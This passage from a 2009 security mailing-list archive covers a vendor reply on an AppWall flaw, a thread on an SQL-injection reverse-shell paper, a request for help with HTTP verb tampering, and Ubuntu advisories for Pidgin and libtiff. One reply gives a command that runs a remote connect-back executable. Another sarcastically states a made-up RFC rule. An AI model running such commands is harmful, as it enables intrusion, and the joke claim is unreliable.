you have credentials, and you are looking to cause harm to the system, you can simply shutdown the AppWall service, change its IP address etc'. PHP source code is not interesting in this case. This is not a critical issue and should be taken in relevant proportions. Regards, Shaked Vax -----Original Message----- From: Vladimir '3APA3A' Dubrovin [mailto:3APA3A at SECURITY.NNOV.RU] Sent: Friday, July 03, 2009 15:58 PM To: Shaked Vax Cc: full-disclosure at lists.grok.org.uk Subject: Re[2]: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface Dear Shaked Vax, Are you sure Radware Team have analysed reflected attack via user's browser (AppWall administrator visits malcrafted page, page redirects his request to AppWall) before excluding remote vector? --Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure at lists.grok.org.uk: SV> Radware team has completed analysis of the reported issue, concluding SV> that no AppWall customer using the product according to Radware SV> deployment recommendations would be exposed to vulnerability as a result SV> of this issue. This is due to the facts that this issue exists only on SV> the management interface that is recommended to be connection to SV> internal LAN only, and that it does not allow performing any actions SV> that would influence machine functionality. SV> Nevertheless, in order to enforce our commitment to deliver top SV> security solution to our customers, Radware will supply a fix for this SV> issue within its upcoming AppWall release. SV> Shaked Vax SV> AppWall Product Manager SV> ShakedV at radware.com SV> _______________________________________________ SV> Full-Disclosure - We believe in it. SV> Charter: http://lists.grok.org.uk/full-disclosure-charter.html SV> Hosted and sponsored by Secunia - http://secunia.com/ -- Skype: Vladimir.Dubrovin ~/ZARAZA http://securityvulns.com/ ?? ?????... ? ?????????? ????? ???????????? ???, ?? ??????? ????????????? ? ?????-?? ???????? ?????? ????. (????) From tbiehn at gmail.com Mon Jul 6 16:07:46 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 6 Jul 2009 11:07:46 -0400 Subject: [Full-disclosure] One Click Ownage [White Paper and Scripts] In-Reply-To: References: <6dc88c3c0907030350l54f956d6m4b9f9c7a950b16c0@mail.gmail.com> Message-ID: <2d6724810907060807lbca6bbua7cee1cf497755f@mail.gmail.com> Ferruh, The script host can be restricted to prevent this 'attack' Uploading files to a windows host has been beaten to death, it's frankly insane that you ever got booked for some security conference. But yeah, the last ditch effort is always netbios, sometimes you even have to modify the local box's rules to allow NBoIP. Hard stuff. -Travis On Mon, Jul 6, 2009 at 12:22 AM, Fredrick Diggle wrote: > Or just > > 'start \\DiggleSec.com\fredrick\connectback.exe' > > would have also been acceptable. > > But Fredrick is sure that your 20 page write-up was fantastically entertaining. > > On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna wrote: >> This is a different and more practical approach to get a reverse shell >> or code execution in SQL Injections (particularly in MSSQL). The idea >> is simple. Getting a reverse shell from an SQL Injection with one HTTP >> request without using an extra channel such as TFTP, FTP to upload the >> initial payload. >> >> White paper explains the steps and the details of the attack. Scripts >> got all the tools you need to create your HTTP request with your own >> payload. >> >> >> White Paper: >> http://ferruh.mavituna.com/papers/oneclickownage.pdf >> >> Scripts: >> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip >> >> Presentation (IT Underground 2009): >> http://www.slideshare.net/fmavituna/one-click-ownage-1660539 >> >> >> >> Regards, >> >> >> -- >> http://ferruh.mavituna.com >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From s0ul at hushmail.me Mon Jul 6 18:13:25 2009 From: s0ul at hushmail.me (s0ul at hushmail.me) Date: Mon, 06 Jul 2009 19:13:25 +0200 Subject: [Full-disclosure] HTTP Verb Tampering Message-ID: <20090706171325.21B4EB8043@smtp.hushmail.com> hey guys, i need some help with a HTTP Verb Tampering attack! by using this attack i already gained access to a folder secured by .htaccess - my problem at the moment is: HOW TO DOWNLOAD FILES BY USING HTTP Verb Tampering? GET, POST and HEAD methods are excluded via .htaccess is there any other method or http verb which allows me to download files without having to gain "real" admin status? thanx for your help, sincerely, s0ul -- Find the right voice for your project by clicking here! http://tagline.hushmail.com/fc/BLSrjkqeFODyUoGdFsWDkBpxQDOZ5jUIytygbZUMolB9pKy3FjUMy78EFAs/ From tbiehn at gmail.com Mon Jul 6 18:53:22 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 6 Jul 2009 13:53:22 -0400 Subject: [Full-disclosure] HTTP Verb Tampering In-Reply-To: <20090706171325.21B4EB8043@smtp.hushmail.com> References: <20090706171325.21B4EB8043@smtp.hushmail.com> Message-ID: <2d6724810907061053l45187d25tc2d290ec21c16028@mail.gmail.com> All web-servers will respond with the file on the 23^x th try to the verb: hackit. For a random value x between 1 and 92. It's in the RFC. This is best implemented as a metasploit module, forthcoming. -Travis On Mon, Jul 6, 2009 at 1:13 PM, wrote: > hey guys, > > i need some help with a HTTP Verb Tampering attack! > by using this attack i already gained access to a folder secured by > .htaccess - my problem at the moment is: > > HOW TO DOWNLOAD FILES BY USING HTTP Verb Tampering? > > GET, POST and HEAD methods are excluded via .htaccess is there any > other method or http verb which allows me to download files without > having to gain "real" admin status? > > thanx for your help, > sincerely, > s0ul > > -- > Find the right voice for your project by clicking here! > ?http://tagline.hushmail.com/fc/BLSrjkqeFODyUoGdFsWDkBpxQDOZ5jUIytygbZUMolB9pKy3FjUMy78EFAs/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From marc.deslauriers at canonical.com Mon Jul 6 19:30:00 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Mon, 06 Jul 2009 14:30:00 -0400 Subject: [Full-disclosure] [USN-796-1] Pidgin vulnerability Message-ID: <1246905000.26456.15.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-796-1 July 06, 2009 pidgin vulnerability CVE-2009-1889 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: pidgin 1:2.4.1-1ubuntu2.5 Ubuntu 8.10: pidgin 1:2.5.2-0ubuntu1.3 Ubuntu 9.04: pidgin 1:2.5.5-1ubuntu8.3 After a standard system upgrade you need to restart Pidgin to effect the necessary changes. Details follow: Yuriy Kaminskiy discovered that Pidgin did not properly handle certain messages in the ICQ protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5.diff.gz Size/MD5: 69164 c70f15e2d9925bd9a59b50840bfb7955 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5.dsc Size/MD5: 1539 721951dceb5f4f14ae2bb4448ad1cac6 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1.orig.tar.gz Size/MD5: 13297380 25e3593d5e6bfc17911111475a057778 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.4.1-1ubuntu2.5_all.deb Size/MD5: 37848 19e50d194b3f88411ecad8fb59ca84ac http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.4.1-1ubuntu2.5_all.deb Size/MD5: 92484 8689a019c2ca2b38e15aff511afcb126 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.4.1-1ubuntu2.5_all.deb Size/MD5: 234622 57a60ab7b5b8200b1c59664fcaed09ad http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.4.1-1ubuntu2.5_all.deb Size/MD5: 1329072 1ccf6543b453ea97c93adeaf3c8cecab http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.4.1-1ubuntu2.5_all.deb Size/MD5: 72644 4cf5e0c20fe9d4e45bf5dbfa9a1977db http://security.ubuntu.com/ubuntu/pool/universe/p/pidgin/gaim_2.4.1-1ubuntu2.5_all.deb Size/MD5: 86650 981f86978bf9d05d0325ca147789ba6a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.5_amd64.deb Size/MD5: 226882 19cfa44a561a43bc3fa11428fbafddaa http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.5_amd64.deb Size/MD5: 1604968 fb1664d9db6f4dcb7515cf0621a0e2c2 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.5_amd64.deb Size/MD5: 4432872 e82202e8158bd7fc5e528eff6352e9f1 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5_amd64.deb Size/MD5: 572092 d745457004a88ace8afe8327919c8366 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.5_i386.deb Size/MD5: 200870 62ba621c0643d3dd4e8a10e7fb627be6 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.5_i386.deb Size/MD5: 1365264 b8851b1dfcc45e5112379d86a8560b4f http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.5_i386.deb Size/MD5: 4242726 8d34410391640602f5fbaab114637eea http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5_i386.deb Size/MD5: 517136 f27931424aae4d2df6d9276d57778ef4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.5_lpia.deb Size/MD5: 197190 125d9dc936b19fc2e30b63395cc91311 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.5_lpia.deb Size/MD5: 1415410 264502f259c45da978283cd2deed21ff http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.5_lpia.deb Size/MD5: 4372712 4815c0b8f5e5db6a483b9b7b5e90202f http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5_lpia.deb Size/MD5: 511658 3fe599d6288bcc92b1eaa8df579a7fae powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.5_powerpc.deb Size/MD5: 237202 c45aea5032ff9e61326243cf29fe58ca http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.5_powerpc.deb Size/MD5: 1633736 3c8b4d4c45b28d0726bc6669c1e82e9c http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.5_powerpc.deb Size/MD5: 4475886 fde137ce8d58e26fb707478742563802 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5_powerpc.deb Size/MD5: 589636 2f142dc2f8674578f52743bd6db54245 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.4.1-1ubuntu2.5_sparc.deb Size/MD5: 212832 e0931b8368e9a5be0edc1dcad7af9cc5 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.4.1-1ubuntu2.5_sparc.deb Size/MD5: 1531968 60665d8ee53ac8f2b83579c6ef120743 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.4.1-1ubuntu2.5_sparc.deb Size/MD5: 4364144 49f051b8a8c85d449e074f43889c6455 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.4.1-1ubuntu2.5_sparc.deb Size/MD5: 545640 dca0481b3b91cac603d926d0b364a075 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3.diff.gz Size/MD5: 61109 89770bcc35af977d3b33c5d4fd432ba1 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3.dsc Size/MD5: 1995 1e9143dccb487f7a07ff787faf305316 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2.orig.tar.gz Size/MD5: 11642659 3ad83133a2381087cbdddf42ba5d6ecf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.5.2-0ubuntu1.3_all.deb Size/MD5: 38228 e74e5d5bdd6259248715951152db8960 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.5.2-0ubuntu1.3_all.deb Size/MD5: 94990 87c0100cb825079578ff39896e39e5bb http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.5.2-0ubuntu1.3_all.deb Size/MD5: 242446 77f527142b4d4ba5de074e24e4c40b8f http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.5.2-0ubuntu1.3_all.deb Size/MD5: 1107018 0dbc651de63d442652be3dae6eb60bac http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.5.2-0ubuntu1.3_all.deb Size/MD5: 1357364 ffeeba39751c4d846dedd7f68b236111 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.3_amd64.deb Size/MD5: 230062 f32d151342bd2936e5737786d84afb4d http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.3_amd64.deb Size/MD5: 1754728 717f54c80158df99362fa15fc7675262 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.3_amd64.deb Size/MD5: 4660546 6803c0dde881db7b106b3157aa4546a6 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3_amd64.deb Size/MD5: 613972 a4f2911a092fe319c3484d21f8cd23b9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.3_i386.deb Size/MD5: 204022 5503dd4f172149179c10a7fbf015f644 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.3_i386.deb Size/MD5: 1503360 98ac05ca1f329a7e6d150973d4309c1c http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.3_i386.deb Size/MD5: 4464556 2b2830ae442a2916342ef423658d0e55 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3_i386.deb Size/MD5: 559586 ae2c916503d04c5443f7e94df2d78fd1 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.3_lpia.deb Size/MD5: 200652 4ceb5dad8ace3009147da0c4a9e72a36 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.3_lpia.deb Size/MD5: 1552258 c2d933448089b75d6b183b93623a5fbb http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.3_lpia.deb Size/MD5: 4599392 638b6d2eaead1319f58776241f617580 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3_lpia.deb Size/MD5: 553784 550a852c80fb57899a429dee2e8ed51a powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.3_powerpc.deb Size/MD5: 235470 97e13f09b0c1be4ca8460089b3462106 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.3_powerpc.deb Size/MD5: 1790468 72432fac2c37bbe8b245b4f49b14accd http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.3_powerpc.deb Size/MD5: 4684996 ba2f04783a3055c59b89309f45aaf7cb http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3_powerpc.deb Size/MD5: 619552 e98dedff7d91d7b1e9c36f0d73ad1d24 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.3_sparc.deb Size/MD5: 217316 4139672f16928314f6fb1ab4a92649f9 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.3_sparc.deb Size/MD5: 1682752 3660dcc970dc9e6f15cdc4619ffa20a4 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.3_sparc.deb Size/MD5: 4586880 d2931f64f5b78a1d999c80eeb9c82546 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.3_sparc.deb Size/MD5: 590742 9dcb513bb95f1a374de48193b5d38137 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3.diff.gz Size/MD5: 132541 c77f3f90cc45c046f39d530cfa080021 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3.dsc Size/MD5: 1935 8ace33777a3ffe91d97759bb2c255997 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5.orig.tar.gz Size/MD5: 11989031 08d9c0c8dd43dbcec6f67d8ba596029f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.5.5-1ubuntu8.3_all.deb Size/MD5: 38440 68fb60c8132a5cc683b5533b16882232 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.5.5-1ubuntu8.3_all.deb Size/MD5: 97546 9b9e3becf081a9a1502e6e7c2f369145 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.5.5-1ubuntu8.3_all.deb Size/MD5: 245608 da22fe05f8bfd598009949876b375842 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.5.5-1ubuntu8.3_all.deb Size/MD5: 1150856 c5b88feffc26cea5f989bb842700983d http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.5.5-1ubuntu8.3_all.deb Size/MD5: 1371436 c3e146ca3f2e9b9e3a1e35e159de39fa amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.3_amd64.deb Size/MD5: 235088 6313965554f24edae96d269b8ea5743e http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.3_amd64.deb Size/MD5: 1769464 2b2735ffe403873bb9ddec66c7489533 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.3_amd64.deb Size/MD5: 5844998 864aa68cfe5341be94d935e587117790 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3_amd64.deb Size/MD5: 567412 359558290269a12016cfae47e6d704d1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.3_i386.deb Size/MD5: 213596 081632a915de7aed83f5329a8e09893e http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.3_i386.deb Size/MD5: 1552816 fe9ae42391f21c1062c278d5a0947619 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.3_i386.deb Size/MD5: 5447566 55fa8f1a1cfd84dd68721055b5e3d59c http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3_i386.deb Size/MD5: 519330 1ae4aec80e938141ec3cbe35732f75a4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.3_lpia.deb Size/MD5: 212130 6ae6d63272086da03f350d8d8d68a0fd http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.3_lpia.deb Size/MD5: 1613110 d4c1dbe21f394c8296832de692d65cce http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.3_lpia.deb Size/MD5: 5594480 bcafb8cef0b0cece6a67fd00deed226d http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3_lpia.deb Size/MD5: 518524 bd071ffbeeef67ca7372e1743b29efd1 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.3_powerpc.deb Size/MD5: 245172 a180211f55d969060d68fdf1546a625f http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.3_powerpc.deb Size/MD5: 1825558 bc765d890d566e67f308875a3df0c916 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.3_powerpc.deb Size/MD5: 5758770 3caed5b7d90fd31babc1538b8d7a1462 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3_powerpc.deb Size/MD5: 580986 c20fb6fe4d0c39ffb808e741c97e6104 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.3_sparc.deb Size/MD5: 214650 5aefec6c79a64ad3660976dd7b4adf97 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.3_sparc.deb Size/MD5: 1640188 baa4c74f1e28da77dfd45516ce158f3d http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.3_sparc.deb Size/MD5: 5292090 20d0c003f0e1977ebe20aaef22b3976f http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.3_sparc.deb Size/MD5: 522162 528d8ae42a85cbf0a56c4ebd9477a8b9 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/07069702/attachment.bin From marc.deslauriers at canonical.com Mon Jul 6 19:30:31 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Mon, 06 Jul 2009 14:30:31 -0400 Subject: [Full-disclosure] [USN-797-1] tiff vulnerability Message-ID: <1246905031.26456.16.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-797-1 July 06, 2009 tiff vulnerability CVE-2009-2285 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libtiff4 3.7.4-1ubuntu3.4 Ubuntu 8.04 LTS: libtiff4 3.8.2-7ubuntu3.2 Ubuntu 8.10: libtiff4 3.8.2-11ubuntu0.8.10.1 Ubuntu 9.04: libtiff4 3.8.2-11ubuntu0.9.04.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that the TIFF library did not correctly handle certain malformed TIFF images. If a user or automated system were tricked into processing a malicious image, a remote attacker could cause an application linked against libtiff to crash, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.4.diff.gz Size/MD5: 19878 69684a7a9c033fb40c755d2bb4dffaa2 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.4.dsc Size/MD5: 764 2a6cbe50d507d9c402ad4e92fa1a66b8 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz Size/MD5: 1280113 02cf5c3820bda83b35bb35b45ae27005 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.4_amd64.deb Size/MD5: 220708 159dcfd51cf69df380ea71620b922f04 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.4_amd64.deb Size/MD5: 282354 541c2a6b0fe97743b984dd97c20395fd http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.4_amd64.deb Size/MD5: 475612 4cb99e064c4547553f0edb081c529809 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.4_amd64.deb Size/MD5: 44662 4f662fbcf9fa548ab4f8b8754306c69b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.4_amd64.deb Size/MD5: 49846 953651334379bbaca92baf34950e2405 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.4_i386.deb Size/MD5: 205896 f5ca6a96e1d3dedb3daea18094d65ac3 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.4_i386.deb Size/MD5: 258978 6f612fbbf5ef115b4dcce981dcacf46f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.4_i386.deb Size/MD5: 461822 ccb6e0322690b9e0f4064ee72813bd1f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.4_i386.deb Size/MD5: 44646 fedd7054ff09c4a761f0bf052adc9dbb http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.4_i386.deb Size/MD5: 49176 4b422744db9046b2e6c24e2eeb8d0863 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.4_powerpc.deb Size/MD5: 239714 2c126df7fad173e8e8facfbfe70d96bf http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.4_powerpc.deb Size/MD5: 288002 38a94eccdd4d769d5c833a4c18861a66 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.4_powerpc.deb Size/MD5: 475924 aae7d86246008c63a0ef95a08b5f4eb2 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.4_powerpc.deb Size/MD5: 46874 da98b514589753068801921dc68ceae6 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.4_powerpc.deb Size/MD5: 51514 80ac11ceaaffc8f848967b0811b7f5e2 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.4_sparc.deb Size/MD5: 208520 4abc2ee74c41ba87917b975a7cb758ed http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.4_sparc.deb Size/MD5: 269972 3cdfd7084bf54d17643e2f00793fb3a5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.4_sparc.deb Size/MD5: 466632 b2c1bfb026aac831ced2ce4dafebf860 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.4_sparc.deb Size/MD5: 44594 f97d5668dd1b3deeb9992be92e1ffc7f http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.4_sparc.deb Size/MD5: 49728 c4ce31f33d03dc294f40ada0bc955887 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.2.diff.gz Size/MD5: 18378 450fcf81a838b9c67637987a2b39088b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.2.dsc Size/MD5: 860 92cf9f6d3136c5b6fb52e4d123c0fdd5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.2_amd64.deb Size/MD5: 186242 28dff44adbabe76ab7e85ff2da365f9d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.2_amd64.deb Size/MD5: 570796 315cdea73e2f4c28c891848d7e7e4fc0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.2_amd64.deb Size/MD5: 130702 854535fab48a5f2a37a9256f61a38ab5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.2_amd64.deb Size/MD5: 5064 4097c51386aaaafbfeae9eabaeb997c9 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.2_amd64.deb Size/MD5: 10494 49c45bed31e28bcd9d5e706f1c8db3cc i386 architecture (x86 compatible Intel/AMD): 